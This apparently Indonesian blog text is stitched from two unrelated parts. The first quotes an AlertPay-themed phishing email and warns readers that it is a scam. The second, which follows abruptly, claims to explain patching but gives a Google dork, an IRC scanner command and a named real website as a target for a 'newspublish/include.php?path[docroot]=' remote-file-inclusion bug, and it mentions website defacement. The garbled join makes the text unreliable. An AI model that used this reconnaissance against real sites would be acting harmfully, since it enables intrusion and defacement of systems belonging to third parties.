Tiba-tiba jadul menerima email dari alertpay. Katanya sih alertpay. Tapi ternyata ini adalah scampage atau fake login yang di kirim oleh spamer untuk mendapatkan email password dan pin dari alertpay yang kita punya. Emailnya:
Security Measures
Dear, sales@indonesiastore.net
Due our latest IP Security upgrades we have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive Alertpay account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection.
How can I restore my account access?
Click the link below and confirm your Alertpay account information, otherwise your Alertpay access will remain restricted:
https://www.alertpay.com/login.aspx
Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. We apologize for any inconvenience.
Copyright 2011 AlertPay All Rights Reserved.
Sebelum masuk ke inti permasalahan, ada yang perlu anda persiapkan:
Ga seru kalo kita hanya bisa melakukan deface web target tanpa pernah mau tahu untuk menutup bug tersebut [ admin security yang baik harus berpikiran secara positif ], padahal untuk menutup bug pada web target bisa dilakukan dengan banyak cara dan kita bisa melakukannya secara manual, penulis akan mencoba memberikan step by step langkah melakukan patching manual secara sederhana tidak perlu berpikiran terlalu jauh karena dengan tehnik ini akan dapat menipu sang penyerang untuk bisa masuk ke dalam target, ok’s penulis coba ambil situs luar [ just for test admin ], kenapa penulis tidak mengambil contoh web target lokal ? jawabannya simpel dan sederhana ada dibenak anda , langsung aja jalankan paman google masukan string bug untuk : newspublish/, atau bila ga mau pusing masuk ke Server IRC cari chanel Underground Indonesia dan lakukan scanning terhadap target dengan string = !scan newspublish/include.php?path[docroot]=, penulis ambil contoh target : http://www.popolariudeur.pv.it/public/amministrazione/newspublish/include.php?path[docroot]=